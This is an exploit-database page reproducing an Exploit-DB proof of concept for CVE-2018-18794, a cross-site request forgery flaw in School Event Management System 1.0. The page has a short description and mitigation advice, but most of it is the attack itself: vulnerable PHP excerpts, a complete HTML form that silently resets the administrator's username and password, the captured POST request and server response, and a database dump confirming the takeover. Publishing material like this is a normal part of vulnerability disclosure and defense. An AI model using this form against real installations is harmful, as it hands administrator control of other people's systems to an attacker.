header-logo
Suggest Exploit
vendor:
School Event Management System
by:
Ihsan Sencan
8.8
CVSS
HIGH
Cross-Site Request Forgery
352
CWE
Product Name: School Event Management System
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: CVE-2018-18794
CPE: a:sourcecodester:school_event_management_system:1.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2018

School Event Management System 1.0 – Cross-Site Request Forgery (Update Admin)

School Event Management System 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks. An attacker can craft a malicious HTML page that contains a form with hidden fields that can be used to update the administrator account. When an authenticated user visits the malicious page, the form will be submitted and the administrator account will be updated with the attacker's credentials.

Mitigation:

Implementing CSRF protection tokens, validating the HTTP Referer header, and using SameSite cookies can help mitigate CSRF attacks.
Source

Exploit-DB raw data:

# Exploit Title: School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18794

# POC: 
# 1)
# .../[PATH]user/user/edit.php
#02      if (!isset($_SESSION['ACCOUNT_ID'])){
#03       redirect(web_root."index.php");
#04      }
#05 
#06   @$USERID = $_GET['id'];
#07     if($USERID==''){
#08   redirect("index.php");
#09 }
#10   $user = New User();
#11   $singleuser = $user->single_user($USERID);
# .../[PATH]user/controller.php
#80 $user = New User(); 
#81 $user->ACCOUNT_NAME 		= $_POST['U_NAME'];
#82 $user->ACCOUNT_USERNAME		= $_POST['U_USERNAME'];
#83 $user->ACCOUNT_PASSWORD		=sha1($_POST['U_PASS']);
#84 $user->ACCOUNT_TYPE			= $_POST['U_ROLE'];
#85 $user->update($_POST['USERID']);
#86 
#87 message("[". $_POST['U_NAME'] ."] has been updated!", "success");
#88 redirect("index.php");
# ...
<html>
<body>
<form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST">
<input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1">
<input name="U_NAME" placeholder="Account Name" type="text" value="admin">

<input name="deptid" type="hidden" value="">
<input name="U_USERNAME" placeholder="Username" type="text" value="admin">

<input name="deptid" type="hidden" value="">
<input name="U_PASS" placeholder="Account Password" type="Password" value="">
<input name="deptid" type="hidden" value="">
<input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value="">

<select name="U_ROLE" id="U_ROLE">
<option value="Administrator">Administrator</option>
<option value="SSG">SSG</option>
</select> 
<button id="save" name="save" type="submit">Save</button> 
</body>
</html>

POST /[PATH]/user/controller.php?action=edit HTTP/1.1
Host: 192.168.1.27
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 136
USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save=
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:57:48 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 128
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

/* `exploitdb`.`useraccounts` */
$useraccounts = array(
  array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png')
);

Navigation

Suggest Exploit

Services By CQR